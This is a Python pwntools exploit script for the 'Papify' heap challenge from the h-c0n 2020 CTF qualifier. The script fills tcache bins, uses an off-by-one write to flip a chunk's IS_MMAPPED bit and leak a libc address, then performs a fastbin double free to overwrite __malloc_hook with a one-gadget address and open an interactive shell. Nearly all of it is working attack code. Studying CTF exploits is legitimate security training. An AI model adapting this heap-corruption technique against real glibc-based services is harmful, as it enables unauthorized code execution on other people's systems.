Papify exploit - h-c0n 2020 CTF qualifier
#!/usr/bin/env python3
# coding: utf-8
from pwn import *
# Session settings: the terminal pwntools uses for spawned debuggers, the
# remote endpoint, and the two binaries the script reads symbols from.
context.terminal = "tmux sp -h".split()
#context.log_level = 'DEBUG'
HOST, PORT = "ctf.h-c0n.com", 60003
# Local copy of the challenge binary and the libc used for libc.sym lookups.
elf = ELF("./chall")
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6", checksec=False)
# False: connect to HOST:PORT; True: run elf.path as a local process.
LOCAL = False
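def add_paper(idx, size, data, shell=False):
    """Drive menu option 1 (add a paper) on the module-level ``io`` tube.

    Answers the "index: " and "size: " prompts, then — unless *shell* is
    truthy — waits for the "content: " prompt and sends *data*. The script
    passes ``shell=True`` only for its last add_paper call, right before
    ``io.interactive()``, so that no further prompt is awaited.

    Args:
        idx: paper slot index; sent as a decimal string.
        size: requested paper size; sent as a decimal string.
        data: content payload (str or bytes) sent after the content prompt.
        shell: when truthy, skip the content prompt/answer exchange.
    """
    io.recvuntil(">> ")
    io.sendline("1")
    io.recvuntil("index: ")
    io.sendline(str(idx))
    io.recvuntil("size: ")
    io.sendline(str(size))
    # `not shell` instead of `shell == False`: any falsy value (False, 0,
    # None) means "send the content", so the branch depends on truthiness
    # rather than on an exact comparison with the False singleton.
    if not shell:
        io.recvuntil("content: ")
        io.sendline(data)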
def edit_paper(idx, pos, data):
    """Drive menu option 2 (edit a paper) on the module-level ``io`` tube.

    Args:
        idx: paper slot index; sent as a decimal string.
        pos: value sent in reply to the "fix?: " prompt; sent as a decimal string.
        data: content payload (str or bytes) sent after the content prompt.
    """
    exchanges = (
        (">> ", "2"),
        ("index: ", str(idx)),
        ("fix?: ", str(pos)),
        ("content: ", data),
    )
    # Each prompt is awaited before its reply is sent, in this fixed order.
    for prompt, reply in exchanges:
        io.recvuntil(prompt)
        io.sendline(reply)
def delete_paper(idx):
    """Drive menu option 3 (delete a paper) on the module-level ``io`` tube.

    Args:
        idx: paper slot index; sent as a decimal string.
    """
    for prompt, reply in ((">> ", "3"), ("index: ", str(idx))):
        io.recvuntil(prompt)
        io.sendline(reply)
def print_paper(idx):
    """Drive menu option 4 (print a paper) on the module-level ``io`` tube.

    Only selects the option and sends the index; reading the printed
    output is left to the caller.

    Args:
        idx: paper slot index; sent as a decimal string.
    """
    for prompt, reply in ((">> ", "4"), ("index: ", str(idx))):
        io.recvuntil(prompt)
        io.sendline(reply)
# --- Exploit body: every step below talks to the service through `io`. ---
# Target selection: a local process of the challenge binary, or the remote
# HOST:PORT service.
if LOCAL == True:
    io = process(elf.path)
else:
    io = remote(HOST, PORT)
# Seven allocate/free cycles of a 0x100-byte paper in slot 0.
for _ in range(7):
    add_paper(0, 0x100, "")
    delete_paper(0)
add_paper(0, 0x108, "")
add_paper(1, 0x100, "")
add_paper(2, 0x10, "") # Barrier
delete_paper(1) # Send chunk to unsorted bin
edit_paper(0, 0x108, b"\x13") # Trigger off-by-one (overwrite IS_MMAPPED bit)
add_paper(1, 0x100, "A" * 7)
print_paper(1)
# Leak parsing: discard the seven 'A's and the newline that follows them,
# take everything up to "\nDone.", and zero-pad it to 8 bytes for u64().
io.recvuntil("A" * 7 + "\n", drop = True)
libc_leak = u64(io.recvuntil("\nDone.", drop = True).ljust(8, b"\x00"))
# 0x1e4ca0 is a hard-coded distance from the leaked pointer to the libc base;
# it is specific to the glibc build the author worked against and is not
# derived from the libc ELF loaded above.
libc.address = libc_leak - 0x1e4ca0
log.success("Leaked GLIBC arena address: " + hex(libc_leak))
log.info("GLIBC base address: " + hex(libc.address))
log.info("__malloc_hook@@GLIBC address: " + hex(libc.sym['__malloc_hook']))
# 0x106ef8 is likewise a hard-coded, build-specific offset; the author labels
# it a one gadget. The same value is written into the final payload below.
log.info("One gadget GLIBC address: " + hex(libc.address + 0x106ef8))
# Seven allocate/free cycles of a 0x68-byte paper in slot 0.
for _ in range(7):
    add_paper(0, 0x68, "")
    delete_paper(0)
add_paper(0, 0x68, "")
add_paper(1, 0x68, "")
# Slot 0 is deleted, then slot 1, then slot 0 again (the same slot twice).
delete_paper(0)
delete_paper(1)
delete_paper(0)
# Contents of the next four allocations: an address 0x23 below
# __malloc_hook, two empty papers, then 0x13 zero bytes followed by the
# libc.address + 0x106ef8 value logged above.
add_paper(0, 0x68, p64(libc.sym['__malloc_hook'] - 0x23))
add_paper(0, 0x68, "")
add_paper(0, 0x68, "")
add_paper(0, 0x68, b'\x00' * 0x13 + p64(libc.address + 0x106ef8))
# shell=True makes add_paper stop after the size reply instead of waiting
# for the "content: " prompt; the session is then handed to the user.
add_paper(1, 1, "", shell = True)
io.interactive()
io.close()